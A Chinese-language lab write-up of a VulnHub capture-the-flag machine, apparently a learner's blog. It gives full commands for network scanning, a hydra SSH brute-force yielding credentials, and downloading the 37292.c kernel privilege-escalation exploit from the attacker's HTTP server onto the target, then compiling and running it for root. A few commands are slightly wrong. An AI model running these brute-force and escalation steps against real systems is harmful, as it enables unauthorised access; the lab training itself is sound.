PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练

准备工作

靶机下载

​​​​​​https://www.vulnhub.com/entry/potato-suncsr-1,556/

可用迅雷下载,也可以点第二个直接下载

PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练_第1张图片

下载后添加至虚拟机,设置网卡为NAT模式

PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练_第2张图片

攻击机:kali虚拟机  网卡为NAT模式  ip地址为192.168.160.129

开始攻击

扫描当前网段下存活主机

nmap -sV 192.168.160.0/24

 或者

arp-scan -l 

PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练_第3张图片

 可确定靶机IP为192.168.160.133

接下来扫描其具体开放的端口

nmap -A 192.168.160.133 -p-   

 PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练_第4张图片

 可见开放了http80端口 和 更改过端口号的ssh 7120端口

访问http80端口

因此先访问http访问其网站   

http://192.168.160.133

 网页首页:这是琦玉老师么   hhhh

PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练_第5张图片

 查看源码,审查元素 都没什么有效信息。

接下来使用 dirb工具 来扫描其下的文件

dirb http://192.168.160.133

PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练_第6张图片

 访问http://192.168.160.133/info.php

PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练_第7张图片

得知该靶机的内核是Ubantu 3.13.0-24-generic 版本 是一款比较老的内核了  以及apache2的存放位置    其余也没有什么可以利用的了

访问ssh7120端口

直接访问是访问不了的 需要用户名和密码   那我们只能暴力破解了  但也要有点小技巧

 利用kali的cewl工具 社会工程生成用户字典   -w是设置生成文件的位置

cewl http://192.168.160.133 -w /user.dic  

 然后就是密码字典了   这就有点麻烦了 需要借助github了   将字典克隆到相应目录下

git clone https://github.com/k8gege/PasswordDic.git

接下来就是爆破了   用的是九头蛇海德拉  

hydra -L /user.dic -P /opt/PasswordDic/top1000.txt -vV ssh://192.168.160.133:7120 -f

慢慢爆破就好了   得到的结果是 potato/letmein

随后用kali   来访问靶机的ssh端口

ssh -p 7120 potato 192.168.160.133

 再输入密码letmein 登录成功

PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练_第8张图片在靶机里各种 ls cat 访问 也没啥线索   我们回想起来该linux的内核比较老了 说不定会有漏洞

 利用ubuntu 3.13.0内核漏洞

kali下 

searchsploit ubuntu 3.13.0

PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练_第9张图片

发现一个可以利用的脚本  Local Privilege Escalation 提权脚本

查看该脚本的信息    -m 将该脚本复制到当前目录下(相当方便不用再去具体目录下找了)

searchsploit -m 37292.c

 接下来我们把这个脚本放在我们kali的http服务器上,然后再利用刚才登录的ssh端口下载下来,再运行即可。

 kali 开启apache2  再打开一个终端

service apache2 start 

cd /var/www/html

searchsploit -m 37292.c

 或者 开放一个简单http服务 

python -m SimpleHTTPService 4567

回到刚才已经登录的ssh的终端    执行

cd /var/tmp
wget http://192.168.160.129:4567/37292.c

之所以放在tmp目录下,是因为要提升该脚本的权限,才能运行该脚本

PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练_第10张图片

 下载完成后,gcc编译该脚本   提升生成的exp文件的执行权限  执行

gcc 37292.c -o exp
chmod +x exp 
./exp

查看该用户 id 发现已经是root权限了

拿到flag

访问root下的 proof.txt  得到flag  成功了!!!!!!ohhhhhhhh!!!!

 PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练_第11张图片

总结:

信息搜集 :python3 dirsearch.py -u 192.168.31.164或者 dirb或者 nikto

暴力破解:hydra

kali的字典生成器:cewl

kali的searchsploit 搜寻攻击脚本 (-m可以复制到当前目录)

登录ssh诱导目标靶机,下载kali http端上的脚本shell  

chmod -x 提升执行权限

记录小白学习过程,这是第二个渗透成功的靶机。

你可能感兴趣的:(网络安全靶机渗透,系统安全,web安全,安全架构,安全)